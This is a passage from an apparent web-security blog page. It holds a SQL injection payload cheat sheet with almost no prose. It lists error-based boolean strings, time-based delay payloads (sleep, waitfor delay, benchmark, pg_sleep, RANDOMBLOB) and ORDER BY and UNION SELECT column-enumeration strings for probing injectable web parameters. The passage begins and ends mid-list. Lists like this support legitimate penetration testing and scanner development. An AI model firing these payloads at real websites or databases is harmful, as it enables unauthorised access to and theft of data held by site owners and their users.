1' ORDER BY 3--+&#13;
1' ORDER BY 1,2--+&#13;
1' ORDER BY 1,2,3--+&#13;
1' GROUP BY 1,2,--+&#13;
1' GROUP BY 1,2,3--+&#13;
' GROUP BY columnnames having 1=1 --&#13;
-1' UNION SELECT 1,2,3--+&#13;
' UNION SELECT sum(columnname ) from tablename --&#13;
-1 UNION SELECT 1 INTO @,@&#13;
-1 UNION SELECT 1 INTO @,@,@&#13;
1 AND (SELECT * FROM Users) = 1    &#13;
' AND MID(VERSION(),1,1) = '5';&#13;
' and 1 in (select min(name) from sysobjects where xtype="U" and name &gt; '.') --&#13;
Finding the table name&#13;
Time-Based:&#13;
,(select * from (select(sleep(10)))a)&#13;
%2c(select%20*%20from%20(select(sleep(10)))a)&#13;
';WAITFOR DELAY '0:0:30'--&#13;
Comments:&#13;
#        Hash comment&#13;
/*      C-style comment&#13;
-- -    SQL comment&#13;
;%00    Nullbyte&#13;
`        Backtick</pre>
<h2 id="ftoc-cac-payload-dua-tren-loi" class="ftwp-heading">Error-based payloads</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">OR 1=1&#13;
 OR 1=0&#13;
 OR x=x&#13;
 OR x=y&#13;
 OR 1=1#&#13;
 OR 1=0#&#13;
 OR x=x#&#13;
 OR x=y#&#13;
 OR 1=1-- &#13;
 OR 1=0-- &#13;
 OR x=x-- &#13;
 OR x=y-- &#13;
 OR 3409=3409 AND ('pytW' LIKE 'pytW&#13;
 OR 3409=3409 AND ('pytW' LIKE 'pytY&#13;
 HAVING 1=1&#13;
 HAVING 1=0&#13;
 HAVING 1=1#&#13;
 HAVING 1=0#&#13;
 HAVING 1=1-- &#13;
 HAVING 1=0-- &#13;
 AND 1=1&#13;
 AND 1=0&#13;
 AND 1=1-- &#13;
 AND 1=0-- &#13;
 AND 1=1#&#13;
 AND 1=0#&#13;
 AND 1=1 AND '%'='&#13;
 AND 1=0 AND '%'='&#13;
 AND 1083=1083 AND (1427=1427&#13;
 AND 7506=9091 AND (5913=5913&#13;
 AND 1083=1083 AND ('1427=1427&#13;
 AND 7506=9091 AND ('5913=5913&#13;
 AND 7300=7300 AND 'pKlZ'='pKlZ&#13;
 AND 7300=7300 AND 'pKlZ'='pKlY&#13;
 AND 7300=7300 AND ('pKlZ'='pKlZ&#13;
 AND 7300=7300 AND ('pKlZ'='pKlY&#13;
 AS INJECTX WHERE 1=1 AND 1=1&#13;
 AS INJECTX WHERE 1=1 AND 1=0&#13;
 AS INJECTX WHERE 1=1 AND 1=1#&#13;
 AS INJECTX WHERE 1=1 AND 1=0#&#13;
 AS INJECTX WHERE 1=1 AND 1=1--&#13;
 AS INJECTX WHERE 1=1 AND 1=0--&#13;
 WHERE 1=1 AND 1=1&#13;
 WHERE 1=1 AND 1=0&#13;
 WHERE 1=1 AND 1=1#&#13;
 WHERE 1=1 AND 1=0#&#13;
 WHERE 1=1 AND 1=1--&#13;
 WHERE 1=1 AND 1=0--&#13;
 ORDER BY 1-- &#13;
 ORDER BY 2-- &#13;
 ORDER BY 3-- &#13;
 ORDER BY 4-- &#13;
 ORDER BY 5-- &#13;
 ORDER BY 6-- &#13;
 ORDER BY 7-- &#13;
 ORDER BY 8-- &#13;
 ORDER BY 9-- &#13;
 ORDER BY 10-- &#13;
 ORDER BY 11-- &#13;
 ORDER BY 12-- &#13;
 ORDER BY 13-- &#13;
 ORDER BY 14-- &#13;
 ORDER BY 15-- &#13;
 ORDER BY 16-- &#13;
 ORDER BY 17-- &#13;
 ORDER BY 18-- &#13;
 ORDER BY 19-- &#13;
 ORDER BY 20-- &#13;
 ORDER BY 21-- &#13;
 ORDER BY 22-- &#13;
 ORDER BY 23-- &#13;
 ORDER BY 24-- &#13;
 ORDER BY 25-- &#13;
 ORDER BY 26-- &#13;
 ORDER BY 27-- &#13;
 ORDER BY 28-- &#13;
 ORDER BY 29-- &#13;
 ORDER BY 30-- &#13;
 ORDER BY 31337-- &#13;
 ORDER BY 1# &#13;
 ORDER BY 2# &#13;
 ORDER BY 3# &#13;
 ORDER BY 4# &#13;
 ORDER BY 5# &#13;
 ORDER BY 6# &#13;
 ORDER BY 7# &#13;
 ORDER BY 8# &#13;
 ORDER BY 9# &#13;
 ORDER BY 10# &#13;
 ORDER BY 11# &#13;
 ORDER BY 12# &#13;
 ORDER BY 13# &#13;
 ORDER BY 14# &#13;
 ORDER BY 15# &#13;
 ORDER BY 16# &#13;
 ORDER BY 17# &#13;
 ORDER BY 18# &#13;
 ORDER BY 19# &#13;
 ORDER BY 20# &#13;
 ORDER BY 21# &#13;
 ORDER BY 22# &#13;
 ORDER BY 23# &#13;
 ORDER BY 24# &#13;
 ORDER BY 25# &#13;
 ORDER BY 26# &#13;
 ORDER BY 27# &#13;
 ORDER BY 28# &#13;
 ORDER BY 29# &#13;
 ORDER BY 30#&#13;
 ORDER BY 31337#&#13;
 ORDER BY 1 &#13;
 ORDER BY 2 &#13;
 ORDER BY 3 &#13;
 ORDER BY 4 &#13;
 ORDER BY 5 &#13;
 ORDER BY 6 &#13;
 ORDER BY 7 &#13;
 ORDER BY 8 &#13;
 ORDER BY 9 &#13;
 ORDER BY 10 &#13;
 ORDER BY 11 &#13;
 ORDER BY 12 &#13;
 ORDER BY 13 &#13;
 ORDER BY 14 &#13;
 ORDER BY 15 &#13;
 ORDER BY 16 &#13;
 ORDER BY 17 &#13;
 ORDER BY 18 &#13;
 ORDER BY 19 &#13;
 ORDER BY 20 &#13;
 ORDER BY 21 &#13;
 ORDER BY 22 &#13;
 ORDER BY 23 &#13;
 ORDER BY 24 &#13;
 ORDER BY 25 &#13;
 ORDER BY 26 &#13;
 ORDER BY 27 &#13;
 ORDER BY 28 &#13;
 ORDER BY 29 &#13;
 ORDER BY 30 &#13;
 ORDER BY 31337 &#13;
 RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='&#13;
 RLIKE (SELECT (CASE WHEN (4346=4347) THEN 0x61646d696e ELSE 0x28 END)) AND 'Txws'='&#13;
IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl--&#13;
IF(7423=7423) SELECT 7423 ELSE DROP FUNCTION xcjl--&#13;
%' AND 8310=8310 AND '%'='&#13;
%' AND 8310=8311 AND '%'='&#13;
 and (select substring(@@version,1,1))='X'&#13;
 and (select substring(@@version,1,1))='M'&#13;
 and (select substring(@@version,2,1))='i'&#13;
 and (select substring(@@version,2,1))='y'&#13;
 and (select substring(@@version,3,1))='c'&#13;
 and (select substring(@@version,3,1))='S'&#13;
 and (select substring(@@version,3,1))='X'</pre>
<h2 id="ftoc-cac-payload-sql-injection-dua-tren-thoi-gian" class="ftwp-heading">SQL Injection payloads are time-based</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic"># from wapiti&#13;
sleep(5)#&#13;
1 or sleep(5)#&#13;
" or sleep(5)#&#13;
' or sleep(5)#&#13;
" or sleep(5)="&#13;
' or sleep(5)='&#13;
1) or sleep(5)#&#13;
") or sleep(5)="&#13;
') or sleep(5)='&#13;
1)) or sleep(5)#&#13;
")) or sleep(5)="&#13;
')) or sleep(5)='&#13;
;waitfor delay '0:0:5'--&#13;
);waitfor delay '0:0:5'--&#13;
';waitfor delay '0:0:5'--&#13;
";waitfor delay '0:0:5'--&#13;
');waitfor delay '0:0:5'--&#13;
");waitfor delay '0:0:5'--&#13;
));waitfor delay '0:0:5'--&#13;
'));waitfor delay '0:0:5'--&#13;
"));waitfor delay '0:0:5'--&#13;
benchmark(10000000,MD5(1))#&#13;
1 or benchmark(10000000,MD5(1))#&#13;
" or benchmark(10000000,MD5(1))#&#13;
' or benchmark(10000000,MD5(1))#&#13;
1) or benchmark(10000000,MD5(1))#&#13;
") or benchmark(10000000,MD5(1))#&#13;
') or benchmark(10000000,MD5(1))#&#13;
1)) or benchmark(10000000,MD5(1))#&#13;
")) or benchmark(10000000,MD5(1))#&#13;
')) or benchmark(10000000,MD5(1))#&#13;
pg_sleep(5)--&#13;
1 or pg_sleep(5)--&#13;
" or pg_sleep(5)--&#13;
' or pg_sleep(5)--&#13;
1) or pg_sleep(5)--&#13;
") or pg_sleep(5)--&#13;
') or pg_sleep(5)--&#13;
1)) or pg_sleep(5)--&#13;
")) or pg_sleep(5)--&#13;
')) or pg_sleep(5)--&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))bAKL) AND 'vRxe'='vRxe&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))YjoC) AND '%'='&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)--&#13;
AND (SELECT * FROM (SELECT(SLEEP(5)))nQIP)#&#13;
SLEEP(5)#&#13;
SLEEP(5)--&#13;
SLEEP(5)="&#13;
SLEEP(5)='&#13;
or SLEEP(5)&#13;
or SLEEP(5)#&#13;
or SLEEP(5)--&#13;
or SLEEP(5)="&#13;
or SLEEP(5)='&#13;
waitfor delay '00:00:05'&#13;
waitfor delay '00:00:05'--&#13;
waitfor delay '00:00:05'#&#13;
benchmark(50000000,MD5(1))&#13;
benchmark(50000000,MD5(1))--&#13;
benchmark(50000000,MD5(1))#&#13;
or benchmark(50000000,MD5(1))&#13;
or benchmark(50000000,MD5(1))--&#13;
or benchmark(50000000,MD5(1))#&#13;
pg_SLEEP(5)&#13;
pg_SLEEP(5)--&#13;
pg_SLEEP(5)#&#13;
or pg_SLEEP(5)&#13;
or pg_SLEEP(5)--&#13;
or pg_SLEEP(5)#&#13;
'\"&#13;
AnD SLEEP(5)&#13;
AnD SLEEP(5)--&#13;
AnD SLEEP(5)#&#13;
&amp;&amp;SLEEP(5)&#13;
&amp;&amp;SLEEP(5)--&#13;
&amp;&amp;SLEEP(5)#&#13;
' AnD SLEEP(5) ANd '1&#13;
'&amp;&amp;SLEEP(5)&amp;&amp;'1&#13;
ORDER BY SLEEP(5)&#13;
ORDER BY SLEEP(5)--&#13;
ORDER BY SLEEP(5)#&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)#&#13;
(SELECT * FROM (SELECT(SLEEP(5)))ecMj)--&#13;
+benchmark(3200,SHA1(1))+'&#13;
+ SLEEP(10) + '&#13;
RANDOMBLOB(500000000/2)&#13;
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))&#13;
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(500000000/2))))&#13;
RANDOMBLOB(1000000000/2)&#13;
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))&#13;
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))&#13;
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/</pre>
<h2 id="ftoc-cac-payload-union" class="ftwp-heading">Payload Unions</h2>
<pre class="EnlighterJSRAW" data-enlighter-language="generic">ORDER BY SLEEP(5)&#13;
 ORDER BY 1,SLEEP(5)&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A'))&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&#13;
 ORDER BY SLEEP(5)#&#13;
 ORDER BY 1,SLEEP(5)#&#13;
 ORDER BY 1,SLEEP(5),3#&#13;
 ORDER BY 1,SLEEP(5),3,4#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#&#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#&#13;
 ORDER BY SLEEP(5)-- &#13;
 ORDER BY 1,SLEEP(5)-- &#13;
 ORDER BY 1,SLEEP(5),3-- &#13;
 ORDER BY 1,SLEEP(5),3,4-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29-- &#13;
 ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- &#13;
 UNION ALL SELECT 1&#13;
 UNION ALL SELECT 1,2&#13;
 UNION ALL SELECT 1,2,3&#13;
 UNION ALL SELECT 1,2,3,4&#13;
 UNION ALL SELECT 1,2,3,4,5&#13;
 UNION ALL SELECT 1,2,3,4,5,6&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30&#13;
 UNION ALL SELECT 1#&#13;
 UNION ALL SELECT 1,2#&#13;
 UNION ALL SELECT 1,2,3#&#13;
 UNION ALL SELECT 1,2,3,4#&#13;
 UNION ALL SELECT 1,2,3,4,5#&#13;
 UNION ALL SELECT 1,2,3,4,5,6#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29#&#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30#&#13;
 UNION ALL SELECT 1-- &#13;
 UNION ALL SELECT 1,2-- &#13;
 UNION ALL SELECT 1,2,3-- &#13;
 UNION ALL SELECT 1,2,3,4-- &#13;
 UNION ALL SELECT 1,2,3,4,5-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14-- &#13;
 UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15-- &#13;
